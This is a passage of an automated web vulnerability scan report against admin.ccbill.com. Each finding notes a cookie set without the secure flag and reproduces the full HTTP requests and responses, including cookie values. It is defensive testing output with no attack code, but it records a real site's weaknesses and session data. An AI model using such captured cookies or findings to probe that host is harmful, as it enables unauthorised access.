GET /images/ccb_AffiliateSystemBanner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:40 GMT
ETag: "3070d-d48-48f3a34968f00"
Accept-Ranges: bytes
Content-Length: 3400
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.19. https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_AffiliateSystemBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_AffiliateSystemBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57ea2-5b9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1465
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.20. https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_ClientSupportAreaBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_ClientSupportAreaBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa4-af0-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2800
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.21. https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LearnMoreBtn.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LearnMoreBtn.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb8-3cb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 971
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.22. https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb9-73e-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1854
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.23. https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa7-10c-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 268
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.24. https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbb-45b-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1115
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.25. https://admin.ccbill.com/images/ccb_LoginBoxRight.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaa-450-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1104
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.26. https://admin.ccbill.com/images/ccb_LoginBoxTop.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxTop.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxTop.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faa-6ea-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1770
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.27. https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox1Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox1Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbe-394-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 916
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.28. https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox2Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox2Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "30718-3e9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1001
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.29. https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox3Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox3Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:06 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f28d-359-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 857
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.30. https://admin.ccbill.com/images/ccb_SupportBarBottom.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:09 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaf-4bb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1211
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.31. https://admin.ccbill.com/images/ccb_SupportBarDiv.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faf-45-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 69
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.32. https://admin.ccbill.com/images/ccb_SupportBarLeft.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f290-304-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 772
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

...[SNIP: binary image body]...

7.33. https://admin.ccbill.com/images/ccb_SupportBarRight.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: TSc23f25. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc5-310-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 784
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c....................................................................................................!.......,......c.....2h.......1.u\.!    A0-<....h0P@X......v..o
..8.D..; 2...G.%.........h.
!
...[SNIP]...

7.34. https://admin.ccbill.com/images/ccb_System5Banner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_System5Banner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Banner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc6-9df-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2527
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..,........GS......Qp)j..6........S.u..K~.8s.!Z./j.+e.................B.3n.h......k..Z..J.-n.Rl.2p..........'_.+j.hz....)e.....V............................<\t..................................
...[SNIP]...

7.35. https://admin.ccbill.com/images/ccb_System5Bkg.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_System5Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
